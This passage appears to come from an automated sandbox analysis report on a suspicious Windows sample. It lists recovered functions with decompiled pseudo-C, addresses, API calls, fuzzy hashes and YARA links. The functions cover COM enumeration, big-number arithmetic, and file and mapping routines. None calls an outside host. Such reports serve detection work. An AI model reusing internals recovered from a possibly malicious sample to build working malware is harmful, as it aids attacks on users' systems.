                              • Opcode Fuzzy Hash: 831fde956b98a8a6311446d6628d15b2d9647b208f237ecc351a515a5a823f7c
                              • Instruction Fuzzy Hash: 89D05E71610215BBDBA21F61EC0EE127F7EFB40364F000021F608DA160EB22AC61CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D52A1, Relevance: 6.2, APIs: 4, Instructions: 152memorystringCOMMON
                              Download Yara Rule
                              C-Code - Quality: 46%
                              			E049D52A1(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x49dd2b8; // 0xe3a5a8
					_t5 = _t102 + 0x49de038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x49dc2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x49dd2b8; // 0xe3a5a8
												_t28 = _t108 + 0x49de0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x49dd2b8; // 0xe3a5a8
														_t33 = _t78 + 0x49de078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}




































                              0x049d52a6
                              0x049d52af
                              0x049d52b0
                              0x049d52b4
                              0x049d52ba
                              0x049d52c0
                              0x049d52c9
                              0x049d52cf
                              0x049d52d9
                              0x049d52db
                              0x049d52e1
                              0x049d52e6
                              0x049d52f1
                              0x049d52f9
                              0x049d52fc
                              0x049d541f
                              0x049d5302
                              0x049d5302
                              0x049d530f
                              0x049d5315
                              0x049d531b
                              0x049d531f
                              0x049d5325
                              0x049d5332
                              0x049d5336
                              0x049d533c
                              0x049d533f
                              0x049d5345
                              0x049d534b
                              0x049d5351
                              0x049d5354
                              0x049d5357
                              0x049d535d
                              0x049d5366
                              0x049d536c
                              0x049d536d
                              0x049d5370
                              0x049d5371
                              0x049d5372
                              0x049d537a
                              0x049d537b
                              0x049d537c
                              0x049d537e
                              0x049d5382
                              0x049d5386
                              0x00000000
                              0x00000000
                              0x049d538c
                              0x049d5395
                              0x049d539b
                              0x049d53a5
                              0x049d53a9
                              0x049d53ab
                              0x049d53b8
                              0x049d53bc
                              0x049d53c4
                              0x049d53c9
                              0x049d53db
                              0x049d53dd
                              0x049d53e3
                              0x049d53e3
                              0x049d53ec
                              0x049d53ec
                              0x049d53ee
                              0x049d53f4
                              0x049d53f4
                              0x049d53f7
                              0x049d53fd
                              0x049d5400
                              0x049d5409
                              0x00000000
                              0x00000000
                              0x00000000
                              0x049d5409
                              0x049d535d
                              0x049d5357
                              0x049d533f
                              0x049d540f
                              0x049d540f
                              0x049d5415
                              0x049d5415
                              0x049d541b
                              0x049d541b
                              0x049d5424
                              0x049d542a
                              0x049d542a
                              0x049d52e6
                              0x049d5433

                              APIs
                              • SysAllocString.OLEAUT32(049DC2B0), ref: 049D52F1
                              • lstrcmpW.KERNEL32(00000000,0076006F), ref: 049D53D3
                              • SysFreeString.OLEAUT32(00000000), ref: 049D53EC
                              • SysFreeString.OLEAUT32(?), ref: 049D541B
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: String$Free$Alloclstrcmp
                              • String ID:
                              • API String ID: 1885612795-0
                              • Opcode ID: 01244a7c1477d22ef56faf4d64a536807e9a056af40a3a7acd123343aee09d68
                              • Instruction ID: b51e0615bcc128a8cbaad46c8ae86d32788069d910369fd42a4d0aa768642a68
                              • Opcode Fuzzy Hash: 01244a7c1477d22ef56faf4d64a536807e9a056af40a3a7acd123343aee09d68
                              • Instruction Fuzzy Hash: 35516E71D00519EFCB00DFA8C488CAEF7BAFF88315B1586A8E915EB214D771AD41CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D42E6, Relevance: 6.2, APIs: 4, Instructions: 152memoryCOMMON
                              Download Yara Rule
                              APIs
                              • SysAllocString.OLEAUT32(?), ref: 049D4327
                              • SysFreeString.OLEAUT32(?), ref: 049D440A
                                • Part of subcall function 049D52A1: SysAllocString.OLEAUT32(049DC2B0), ref: 049D52F1
                              • SafeArrayDestroy.OLEAUT32(?), ref: 049D445E
                              • SysFreeString.OLEAUT32(?), ref: 049D446C
                                • Part of subcall function 049D2C14: Sleep.KERNEL32(000001F4), ref: 049D2C5C
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: String$AllocFree$ArrayDestroySafeSleep
                              • String ID:
                              • API String ID: 3193056040-0
                              • Opcode ID: 561148631e5515020cbc67eb913c94968ebcbdbb504a2fd3273f687dd76e753e
                              • Instruction ID: f2cdad1c4a5cf92d42b2fa0131a9df93a4e59ac0f45857d6a2c0ee82ccad8715
                              • Opcode Fuzzy Hash: 561148631e5515020cbc67eb913c94968ebcbdbb504a2fd3273f687dd76e753e
                              • Instruction Fuzzy Hash: C8512A76900209AFDF00DFA8C8848AEB7F6FF88304B15C978E615EB214D775AD86CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D2698, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                              Download Yara Rule
                              C-Code - Quality: 85%
                              			E049D2698(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E049D455D(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E049D6CD0(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E049D21F3(_t101,  &_v428, _a8, _t96 - _t81);
					E049D21F3(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E049D6CD0(_t101,  &E049DD168);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E049D6CD0(_a16, _a4);
						E049D3213(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L049DB030();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L049DB02A();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E049D3CAA(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E049D675C(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E049D9089(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E049DD168) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                              0x049d269b
                              0x049d26a7
                              0x049d26ad
                              0x049d26b2
                              0x049d26b6
                              0x049d2828
                              0x049d282c
                              0x049d282c
                              0x049d26bc
                              0x049d26c0
                              0x049d26c6
                              0x049d26c7
                              0x049d26d2
                              0x049d26d8
                              0x049d26dd
                              0x049d26e0
                              0x049d26fa
                              0x049d2709
                              0x049d2715
                              0x049d271f
                              0x049d2724
                              0x049d2726
                              0x049d2729
                              0x049d27e0
                              0x049d27e6
                              0x049d27f7
                              0x049d280a
                              0x049d2820
                              0x00000000
                              0x049d2825
                              0x049d2732
                              0x049d2739
                              0x049d273d
                              0x049d2743
                              0x049d2745
                              0x049d2747
                              0x049d2749
                              0x049d274b
                              0x049d2755
                              0x049d275a
                              0x049d275c
                              0x049d275e
                              0x049d275f
                              0x049d2760
                              0x049d2761
                              0x049d2768
                              0x049d276f
                              0x049d2772
                              0x049d2772
                              0x049d273f
                              0x049d273f
                              0x049d273f
                              0x049d277a
                              0x049d2782
                              0x049d278e
                              0x049d2793
                              0x049d2793
                              0x049d2798
                              0x00000000
                              0x00000000
                              0x049d279a
                              0x049d279d
                              0x049d27aa
                              0x00000000
                              0x00000000
                              0x049d27ac
                              0x049d27ac
                              0x049d27b9
                              0x049d2793
                              0x049d2798
                              0x00000000
                              0x00000000
                              0x00000000
                              0x049d2798
                              0x049d27c3
                              0x049d27c6
                              0x049d27c9
                              0x049d27d0
                              0x049d27d0
                              0x049d27dd
                              0x00000000
                              0x049d27dd
                              0x049d26c9
                              0x049d26cd
                              0x049d26ce
                              0x049d26d0
                              0x00000000
                              0x00000000
                              0x00000000
                              0x049d26d0
                              0x00000000

                              APIs
                              • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 049D274B
                              • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 049D2761
                              • memset.NTDLL ref: 049D280A
                              • memset.NTDLL ref: 049D2820
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: memset$_allmul_aulldiv
                              • String ID:
                              • API String ID: 3041852380-0
                              • Opcode ID: 518ae4809529f9be31d2d7cd1a7be169b36e4e285a1f3ba41686eaaf432c9d0c
                              • Instruction ID: d1817a25cc8521f0dd379fb5ba8c990552d4d2fd977646e5c536d35ca6510f29
                              • Opcode Fuzzy Hash: 518ae4809529f9be31d2d7cd1a7be169b36e4e285a1f3ba41686eaaf432c9d0c
                              • Instruction Fuzzy Hash: 51418031B01219AFEB209F68DC40BEE7779EF85314F10C5B9E919A7280DB70BE548B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053E3CD4, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                              Download Yara Rule
                              APIs
                              • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 053E3D87
                              • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 053E3D9D
                              • memset.NTDLL ref: 053E3E46
                              • memset.NTDLL ref: 053E3E5C
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: memset$_allmul_aulldiv
                              • String ID:
                              • API String ID: 3041852380-0
                              • Opcode ID: 8596bac94d2a9767fcf40998b051c2dc8b68f46efa9bd93c5151ac50f304f1db
                              • Instruction ID: 58fd16fe762dc75e8958470f79502d90210b28ac2b5768c3b07bf3bf5ab53b7b
                              • Opcode Fuzzy Hash: 8596bac94d2a9767fcf40998b051c2dc8b68f46efa9bd93c5151ac50f304f1db
                              • Instruction Fuzzy Hash: 21418332B00229ABDB20DF68DC84BEFB7B9EF45710F104569F915A71C0DB70AE558B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053C6C90, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053D6A98: GetSystemTimeAsFileTime.KERNEL32(?,?,00000000), ref: 053D6AA6
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053C6CF8
                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 053C6D47
                                • Part of subcall function 053C6D99: CreateFileW.KERNEL32(00000000,C0000000,053C23FB,00000000,053C23FC,00000080,00000000,00000000,053E8BAA,747869A0,053C23FB,?), ref: 053C6DDA
                                • Part of subcall function 053C6D99: GetLastError.KERNEL32 ref: 053C6DE4
                                • Part of subcall function 053C6D99: WaitForSingleObject.KERNEL32(000000C8), ref: 053C6E09
                                • Part of subcall function 053C6D99: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 053C6E2A
                                • Part of subcall function 053C6D99: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 053C6E52
                                • Part of subcall function 053C6D99: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 053C6E67
                                • Part of subcall function 053C6D99: SetEndOfFile.KERNEL32(00000001), ref: 053C6E74
                                • Part of subcall function 053C6D99: CloseHandle.KERNEL32(00000001), ref: 053C6E8C
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,00000000,?,00000001), ref: 053C6D7C
                              • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 053C6D8C
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
                              • String ID:
                              • API String ID: 4200334623-0
                              • Opcode ID: e984ed33bb9b972392b4843e751c5c4355c68c3905166da0662b2ce433f24ed9
                              • Instruction ID: 0b6c1feefbfe2d1110f17febb254d9cc65a29c37268f84d6a937f4c8a6c350ca
                              • Opcode Fuzzy Hash: e984ed33bb9b972392b4843e751c5c4355c68c3905166da0662b2ce433f24ed9
                              • Instruction Fuzzy Hash: D4310AB6510119BFDB109FA8DC8ECAABFBDFB08354B104065F502DB161DB71AE51DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053DBC12, Relevance: 6.1, APIs: 4, Instructions: 83memoryregistryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 053DBC6B
                              • memcpy.NTDLL(00000018,?,?), ref: 053DBC94
                              • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_0000A97F,00000000,000000FF,00000008), ref: 053DBCD3
                              • HeapFree.KERNEL32(00000000,00000000), ref: 053DBCE6
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
                              • String ID:
                              • API String ID: 2780211928-0
                              • Opcode ID: 7df587967b016fe5c0d424299bbd0cd20ac40e6531a8a687e5ed1078bb1f7f21
                              • Instruction ID: 36e25770ccfadd603173aadbe5a775f589f63ab200348681811b862da3bb21c9
                              • Opcode Fuzzy Hash: 7df587967b016fe5c0d424299bbd0cd20ac40e6531a8a687e5ed1078bb1f7f21
                              • Instruction Fuzzy Hash: F3315E75200209AFDB208F19EC49E5ABFBDFF44320F004129F916DB291DBB0E955DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053C1C03, Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                              Download Yara Rule
                              APIs
                              • TlsGetValue.KERNEL32(?), ref: 053C1C32
                              • SetEvent.KERNEL32(?), ref: 053C1C7C
                              • TlsSetValue.KERNEL32(00000001), ref: 053C1CB6
                              • TlsSetValue.KERNEL32(00000000), ref: 053C1CD2
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Value$Event
                              • String ID:
                              • API String ID: 3803239005-0
                              • Opcode ID: f52d5478218e34cabb98e9a05b33bd08c9a3320dbb4154b3644834f3f5207cd2
                              • Instruction ID: 2b16b03df8807ba68436d87d6efbca3d5384076c927e315da5eb5961efc364b2
                              • Opcode Fuzzy Hash: f52d5478218e34cabb98e9a05b33bd08c9a3320dbb4154b3644834f3f5207cd2
                              • Instruction Fuzzy Hash: 5121AE31210208AFDB369F29DD8996A7FAAFF41350F55886DF402CA1A1D7B1EC52EB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D7796, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                              Download Yara Rule
                              C-Code - Quality: 78%
                              			E049D7796(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E049D55DC(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                              0x049d77a2
                              0x049d77a6
                              0x049d77a7
                              0x049d77a8
                              0x049d77aa
                              0x049d77ac
                              0x049d77b1
                              0x049d77b4
                              0x049d784b
                              0x049d7852
                              0x049d7852
                              0x049d77bd
                              0x049d77c4
                              0x049d77d4
                              0x049d77d4
                              0x049d77da
                              0x049d77dc
                              0x049d77e1
                              0x049d77ea
                              0x049d77f2
                              0x049d77f5
                              0x049d7800
                              0x049d7804
                              0x049d7806
                              0x049d7807
                              0x049d7810
                              0x049d7814
                              0x049d7825
                              0x049d7816
                              0x049d781b
                              0x049d7820
                              0x049d782f
                              0x049d782f
                              0x049d7804
                              0x049d7835
                              0x049d783b
                              0x049d783b
                              0x049d7844
                              0x049d7849
                              0x049d7849
                              0x00000000

                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: FreeSleepStringlstrlenmemcpy
                              • String ID:
                              • API String ID: 1198164300-0
                              • Opcode ID: b8e41626cfaea481d489e70467f58562ddf84eab48d5f21b0308b2bc24b521c1
                              • Instruction ID: ed0e9898c6de7f7629c3db220c30da3e8a5f1f4178bd1da13c604bc14b432672
                              • Opcode Fuzzy Hash: b8e41626cfaea481d489e70467f58562ddf84eab48d5f21b0308b2bc24b521c1
                              • Instruction Fuzzy Hash: 1B212175A01209EFDB11DFE8D88499EBBB9FF89315B1081B9E905E7210E774EA41CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053CEEDE, Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 053CEF00
                              • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 053CEF44
                              • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 053CEF87
                              • CloseHandle.KERNEL32(?,?,?,?,?), ref: 053CEFAA
                                • Part of subcall function 053DD6A6: GetTickCount.KERNEL32 ref: 053DD6B6
                                • Part of subcall function 053DD6A6: CreateFileW.KERNEL32(053C4252,80000000,00000003,053F0244,00000003,00000000,00000000,?,00000000,?,053C4252), ref: 053DD6D3
                                • Part of subcall function 053DD6A6: GetFileSize.KERNEL32(053C4252,00000000,?,00000001,?,00000000,?,053C4252), ref: 053DD706
                                • Part of subcall function 053DD6A6: CreateFileMappingA.KERNEL32(053C4252,053F0244,00000002,00000000,00000000,053C4252), ref: 053DD71A
                                • Part of subcall function 053DD6A6: lstrlen.KERNEL32(053C4252,?,00000000,?,053C4252), ref: 053DD736
                                • Part of subcall function 053DD6A6: lstrcpy.KERNEL32(?,053C4252), ref: 053DD746
                                • Part of subcall function 053DD6A6: HeapFree.KERNEL32(00000000,053C4252,?,00000000,?,053C4252), ref: 053DD761
                                • Part of subcall function 053DD6A6: CloseHandle.KERNEL32(053C4252,?,00000001,?,00000000,?,053C4252), ref: 053DD773
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
                              • String ID:
                              • API String ID: 3239194699-0
                              • Opcode ID: 35378875553c52bc0e73c526ea68387f4d1efb8720b71a07f5f0b1fe0340bd76
                              • Instruction ID: 897e8c90e3e5debcbc96e6a1d437f7dddcd2caa848c97286b2eadf0d317789f1
                              • Opcode Fuzzy Hash: 35378875553c52bc0e73c526ea68387f4d1efb8720b71a07f5f0b1fe0340bd76
                              • Instruction Fuzzy Hash: 75216B72500208EEDB22DF65DC48EDEBFBDFF44710F150129F915961A0D7318805DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053C4CC5, Relevance: 6.1, APIs: 4, Instructions: 73stringCOMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 053C4CF4
                              • lstrlen.KERNEL32(053C2C01), ref: 053C4D04
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • strcpy.NTDLL ref: 053C4D1B
                              • StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 053C4D25
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: AllocateHeaplstrlenmemsetstrcpy
                              • String ID:
                              • API String ID: 528014985-0
                              • Opcode ID: 69d5aa7d9231bbf9aa78a62ec6a382595ed78d351385604290847d1521555c83
                              • Instruction ID: a7ce2b1a6615b4d155a863c74827b7b181f0ce4a9acd9bdc5be8237a165c19e8
                              • Opcode Fuzzy Hash: 69d5aa7d9231bbf9aa78a62ec6a382595ed78d351385604290847d1521555c83
                              • Instruction Fuzzy Hash: B021CF76214301ABDB21AF64E85DB2A7BFDBB84312F10845CF9568B292EBB1D8008721
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053C3E09, Relevance: 6.1, APIs: 4, Instructions: 70fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053E4BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,053C3E20), ref: 053E4BF0
                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 053C3E5B
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,053C68F0,?), ref: 053C3E6D
                              • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,053C68F0,?), ref: 053C3E85
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,053C68F0,?), ref: 053C3EA0
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: File$CloseCreateHandleModuleNamePointerRead
                              • String ID:
                              • API String ID: 1352878660-0
                              • Opcode ID: 3edeb7b57d560b5eadf246b49cc124f17d336bc22b8fb7514509775a0fd247f2
                              • Instruction ID: b16a09624c918ea01fbb1e080d00cabeacc3451b7ad0902cdc950a844511032c
                              • Opcode Fuzzy Hash: 3edeb7b57d560b5eadf246b49cc124f17d336bc22b8fb7514509775a0fd247f2
                              • Instruction Fuzzy Hash: F2114F72A01128BBDB21AEA5DC89EEFBFADEF02750F108455F515E6090D7718E40C7A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D2DDE, Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(?,00000000,747C8250,747869A0,?,?,?,053C5AE4,?,00000000,?), ref: 053D2DEE
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,053C5AE4,?,00000000,?), ref: 053D2E10
                              • lstrcpyW.KERNEL32(00000000,?), ref: 053D2E3C
                              • lstrcatW.KERNEL32(00000000,?), ref: 053D2E4F
                                • Part of subcall function 053E41EE: strstr.NTDLL ref: 053E42C6
                                • Part of subcall function 053E41EE: strstr.NTDLL ref: 053E4319
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
